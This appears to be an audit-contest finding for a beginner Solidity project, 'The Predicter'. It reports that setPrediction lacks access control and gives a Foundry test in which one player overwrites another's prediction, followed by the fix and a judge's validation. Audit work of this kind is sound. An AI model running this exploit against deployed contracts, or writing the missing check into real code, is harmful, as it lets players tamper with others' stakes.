First Flight #20: The Predicter
First Flight #20
Beginner FriendlyFoundry
100 EXP
View results
Previous Next
Submission Details
Severity: high
Valid

A player can change the prediction of other players

_frolic

Summary

A player can change the prediction of other players.

Vulnerability Details

The ThePredicter::makePrediction function enables players to make predictions on the outcome of the matches and uses msg.sender to determine the player, the ThePredicter::setPrediction function lets players change their prediction and has a player parameter which is the address of the player to change prediction for.

Proof of Concept

Add the code below to the test file

function test_makePredictionForOthers() public {
address stranger2 = makeAddr("stranger2");
vm.startPrank(stranger);
vm.warp(1);
vm.deal(stranger, 1 ether);
thePredicter.register{value: 0.04 ether}();
vm.stopPrank();
vm.startPrank(organizer);
vm.warp(2);
thePredicter.approvePlayer(stranger);
vm.stopPrank();
vm.warp(1723752000 );
vm.startPrank(stranger);
thePredicter.makePrediction{value: 0.0001 ether}(
1,
ScoreBoard.Result.Draw
);
scoreBoard.setPrediction(stranger, 1, ScoreBoard.Result.First);
scoreBoard.setPrediction(stranger, 0, ScoreBoard.Result.First);
vm.stopPrank();
vm.startPrank(stranger2);
scoreBoard.setPrediction(stranger, 1, ScoreBoard.Result.Draw);
vm.stopPrank();
}

Impact

Any player can change the prediction of other players by calling the ThePredicter::setPrediction function with the desired players address as the Player parameter.

Tools Used

Manual Analysis

Recommendations

Add checks to ensure the player's address is the msg.sender address.

Updates

Lead Judging Commences

NightHawK Lead Judge about 1 year ago
Submission Judgement Published
Validated
Assigned finding tags:

setPrediction lacks access control

setPrediction has no access control and allows manipulation to Players' predictions.

Support

FAQs

Can't find an answer? Chat with us on Discord, Twitter or Linkedin.